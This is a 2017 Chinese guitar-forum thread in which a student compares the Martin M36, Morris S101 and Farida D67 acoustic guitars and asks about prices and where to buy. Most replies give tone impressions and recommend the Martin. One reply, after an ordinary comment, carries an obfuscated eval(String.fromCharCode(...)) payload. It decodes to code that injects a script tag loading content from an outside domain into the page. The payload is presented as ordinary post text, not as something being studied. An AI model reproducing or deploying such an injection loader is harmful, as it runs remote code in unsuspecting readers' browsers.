fcccccccc_ 发表于 2017-3-21 12:48:59

马丁m36,Morris s101,法丽达d67

马丁m36,Morris s101,法丽达d67。
求各位大神简要评价下这三把选哪个。
预算1万5左右。平时玩指弹多一些,弹唱也玩,风格不定,都玩。学生党,对这个价位的琴完全不了解,求各位大神指教选哪把,比较靠谱的价格,已经购买渠道。另外如果有其他的不错的也请推荐,十分感谢
发自吉他中国iPhone客户端

Outro 发表于 2017-3-21 12:53:07

morris s101用过,拿来弹日系很合适,高中低频比较均衡,动态很好,低音感觉差点力道,整体都是很柔和的感觉,很好驱动但真心不适合扫弦,一扫音色糊成一大片

fcccccccc_ 发表于 2017-3-21 12:55:19

Morris这把大概的价格和购买渠道可以说一下吗

chicha123456 发表于 2017-3-21 12:55:46

马丁据说不会后悔

我是谁杯茶 发表于 2017-3-21 13:25:23

推荐马丁M36

孤单乐行者 发表于 2017-3-21 14:08:51

fcccccccc_ 发表于 2017-3-21 16:51:24

孤单乐行者 发表于 2017-3-21 14:08
1万5买不了M36吧,我还是支持马丁的
Morris的指板较宽,可能更适合指弹吧,均衡琴,但渠道并不好找,我知道 ...

优酷看了些测评,听着觉得d67居然和马丁d35差不多,想问如果想您说的9k左右拿到怎么样,另外我也是更倾向马丁的,想问问m36大概什么价格什么途径买比较值

孤单乐行者 发表于 2017-3-21 18:40:44

aspp123 发表于 2017-3-21 19:25:20

可以看看我的morris
我在闲鱼卖·morris s101#来闲鱼,发现更多闲置超值好物#http://a.redfcv.com/F.1UHUL

再见2014 发表于 2017-3-21 19:57:47

马丁m36

fcccccccc_ 发表于 2017-3-21 20:26:37

孤单乐行者 发表于 2017-3-21 18:40
首先我觉得这个价格的东西不要找熟人买了(除非是至亲,生死之交一类的),有点小问题你也没法说,说了的 ...

感谢解疑,那请问m36我砍价的话大概砍到多少比较合适呢,另外听说上海乐展买琴不错,那时候会不会便宜些,或者什么时候买琴最好

fcccccccc_ 发表于 2017-3-21 20:27:56

再见2014 发表于 2017-3-21 19:57
马丁m36

想请问m36大概什么途径什么价格比较合适呢

minzhi5255 发表于 2017-3-21 21:24:57

马丁据说不会后悔

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

GC木琴客服 发表于 2017-3-21 21:35:42

我喜欢M36 建议购买

fcccccccc_ 发表于 2017-3-21 21:41:15

GC木琴客服 发表于 2017-3-21 21:35
我喜欢M36 建议购买

价格和途径呢??

fcccccccc_ 发表于 2017-3-21 21:42:37

再问各位大神求指导下合理的价格是什么,到时也好还价,谢谢

GC木琴客服 发表于 2017-3-21 22:12:53

你加我QQ详聊 1487850936

woshangfei 发表于 2017-3-21 23:49:48

这个我觉得不必纠结直接马丁优酷听试听听不出个啥琴还是得自己弹了才能客观比较

琴不离身 发表于 2017-3-22 00:27:20

马丁,R67都可以

孤单乐行者 发表于 2017-3-22 12:47:23

coco0262 发表于 2017-3-23 14:24:24

六楼说的道理,确实是暴力,卖到上万确实暴力,买不起啊

xsxboa1234 发表于 2017-4-13 15:27:55

虽然都没摸过,但是给我选的话,还是m36
页: [1]
查看完整版本: 马丁m36,Morris s101,法丽达d67